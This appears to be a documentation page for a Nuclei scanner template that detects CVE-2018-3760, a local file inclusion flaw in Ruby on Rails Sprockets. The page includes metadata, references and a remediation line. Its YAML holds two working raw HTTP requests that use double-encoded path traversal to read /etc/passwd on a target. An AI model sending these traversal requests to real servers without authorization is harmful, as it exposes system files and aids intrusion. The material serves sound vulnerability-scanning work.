Skip to content
Nuclei Templates

Ruby On Rails - Local File Inclusion

ID: CVE-2018-3760

Severity: high

Author: 0xrudra,pikpikcu

Tags: cve2018,cve,rails,lfi,ruby,vulhub,seclists,redhat

Description

Section titled “Description”

Ruby On Rails is vulnerable to local file inclusion caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server.

YAML Source

Section titled “YAML Source”
id: CVE-2018-3760


info:
  name: Ruby On Rails - Local File Inclusion
  author: 0xrudra,pikpikcu
  severity: high
  description: |
    Ruby On Rails is vulnerable to local file inclusion caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive files and information stored on the server.
  remediation: |
    Apply the latest security patches and updates for Ruby On Rails framework to fix the Local File Inclusion vulnerability.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2018-3760
    - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
    - https://seclists.org/oss-sec/2018/q2/210
    - https://xz.aliyun.com/t/2542
    - https://nvd.nist.gov/vuln/detail/CVE-2018-3760
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-3760
    cwe-id: CWE-200,CWE-22
    epss-score: 0.02274
    epss-percentile: 0.88524
    cpe: cpe:2.3:a:redhat:cloudforms:4.5:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: redhat
    product: cloudforms
  tags: cve2018,cve,rails,lfi,ruby,vulhub,seclists,redhat


http:
  - raw:
      - |
        GET /assets/file:%2f%2f/etc/passwd HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200


    extractors:
      - type: regex
        name: path
        regex:
          - "/etc/passwd is no longer under a load path: (.*?),"
        internal: true
        part: body
# digest: 4b0a00483046022100d9020948e855a23c60eed613dd6cdbc0387bc8bd0a4acd74949eb84dce7b9308022100c0ed767fe4ee3f59b7ea074ae3605fc00d8baa8e85e540c1b3826418eb27131a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-3760.yaml"

View on Github